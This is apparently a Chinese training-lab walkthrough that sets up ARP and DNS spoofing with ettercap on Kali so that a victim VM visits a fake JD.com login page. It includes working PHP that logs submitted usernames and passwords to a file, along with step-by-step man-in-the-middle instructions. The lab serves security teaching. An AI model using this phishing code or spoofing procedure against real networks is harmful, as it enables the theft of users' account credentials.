本章节主要利用中间人攻击,DNS欺骗,实现被攻击者访问钓鱼网站,并实现收集被攻击者的登录用户名与密码。
链接:https://pan.baidu.com/s/1Os4HY-8BNWbVjpgQ1Bw-4Q
提取码:2lab
一、实训内容:DNS欺骗、ARP攻击及钓鱼网站制作 二、实训背景
钓鱼者运用社会工程学(social engineering)知识诱骗受害者,以在未授权情况下获取对方的姓名、年龄、 邮箱账号、甚至是银行卡密码等私人信息
钓鱼往往和社会工程学相结合进行诱导,而社会工程学是黑客的内功,能否灵活运用可以体现一个黑客的个人 修为,所以说“防人之心不可无”这句话并非没有道理,凡事不要害人但是总要留个心眼否则最终受伤的就是自己。
一、实训内容:DNS欺骗、ARP攻击及钓鱼网站制作
二、实训背景
钓鱼者运用社会工程学(social engineering)知识诱骗受害者,以在未授权情况下获取对方的姓名、年龄、 邮箱账号、甚至是银行卡密码等私人信息
钓鱼往往和社会工程学相结合进行诱导,而社会工程学是黑客的内功,能否灵活运用可以体现一个黑客的个人 修为,所以说“防人之心不可无”这句话并非没有道理,凡事不要害人但是总要留个心眼否则最终受伤的就是自己。
社会工程学黑客常见伎俩:电话号码欺骗、 利用坏消息作案、 滥用网民对社交等网站的信任 二维码引诱、 等等
本案例利用虚假的京东网站,并且使用DNS与ARP欺骗手段诱使用户输入真实的用户名密码。
三、实现目标
使用kali系统模拟攻击者,利用中间人的攻击手段来对受害者进行DNS欺骗、使受害者通过访问假的京东网站,来 获取用户登录的用户名与密码。
四、环境介绍及拓扑图
1、虚拟机软件
WindowsXP----模拟客户机
Windows server 2003----模拟公网的DNS服务器与京东网站服务器 Kali----模拟攻击机
3、Web站点素材
JD网站站点素材
4、工具
ettercap(kali自带)
5、实验拓扑图
6、站点素材关键代码
<?php $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $content = "您已捕获京东账号及密码1个:" . " 用户名 " . $nam . " 密码 " . $pas; $filed = @fopen("1.txt", "a+"); @fwrite($filed, "$content\n"); ?> <html> <head> <script type="text/javascript"> function goBack() { window.history.back() //后退+刷新 } </script> </head> <body onload="goBack()"> <!-- 加载之后立即执行一段 JavaScript --> </body> </html>
五、实验流程
1、开启虚拟机并配置IP
1.2、并将此三台虚拟机放到同一个虚拟网络中,本实验为VMnet2,如图。
1.3、设置客户机win XP的IP地址为10.1.1.1
1.4、配置攻击机kali的IP地址为10.1.1.2,命令如下:
root@kali:~# ifconfig eth0 10.1.1.2/24
1.5、设置服务器win2003的IP地址为10.1.1.3(方法同XP)
注意:
1、三台虚拟机的子网掩码均为255.255.255.0
1.6、IP设置完毕后,使用ping命令测试网络连通性。(应确保防火墙已关闭)
2、在win2003中搭建京东WEB服务器及DNS服务器
2.1、将实验网站的文件夹JD,放到win2003的D盘中。
2.2、部署WEB服务器及DNS服务器 启动IIS:开始—管理工具—Internet信息服务(IIS)管理器。
然后打开 Internet信息服务(IIS)管理器 ,点击默认网站右键属性。
主目录--指向D盘的JD站点目录。
设置默认首页:
打开DNS服务工具。
新建jd.com解析文件,并添加一条A记录:www.jd.com ---指向-- 10.1.1.3
3、客户机尝试访问真正的京东
3.1、在XP虚拟机中,用浏览器打开图中的网址www.jd.com
3.2、尝试解析京东网站域名,结果为正确的IP地址。
4、开启ARP欺骗、DNS欺骗
4.1、将钓鱼网页的所有文件放到 kali 的/var/www/html/路径下, 并修改 1.txt 的权限, 使这个文档可以写入数 据。
4.2、开启apache服务,并检查80端口是否已开启。
4.3、修改 DNS 欺骗配置文件, 使用 vim 编辑器, 命令: vim /etc/ettercap/etter.dns,然后 添加一条 A 记录, 添加一条 PTR 记录,使用户访问任何网页,全部指向为10.1.1.2
4.4、打开ettercap软件,如图,在搜索框中输入etter,即可搜索到ettercap软件。
4.5、选择sniff--unified sniffing,并选择监听eth0。
4.6、然后选择Hosts——Scan for hosts,如图,
4.7、扫描完成后选择Hosts——Hosts list,可以看到扫描到的主机,如图.
4.8、添加欺骗记录 选中10.1.1.1,点击Add to Target 1。
选中10.1.1.3,然后点击 Add to Target2.
4.9、在Mitm选择ARP欺骗,如图。
在弹出的窗口中,勾选第一个点击确定,
4.10、选择plugins -- Manage the plugins,准备进行DNS欺骗
在弹出的窗口中, 找到 dns spoof 并双击出现*号,开始DNS欺骗, 如图
5.开始钓鱼
5.1、在XP系统中,再次登录www.jd.com输入用户名密码等,如图,然后点击登录。
5.2、在kali虚拟机中,已经钓鱼成功,并钓到京东的登录账户及密码。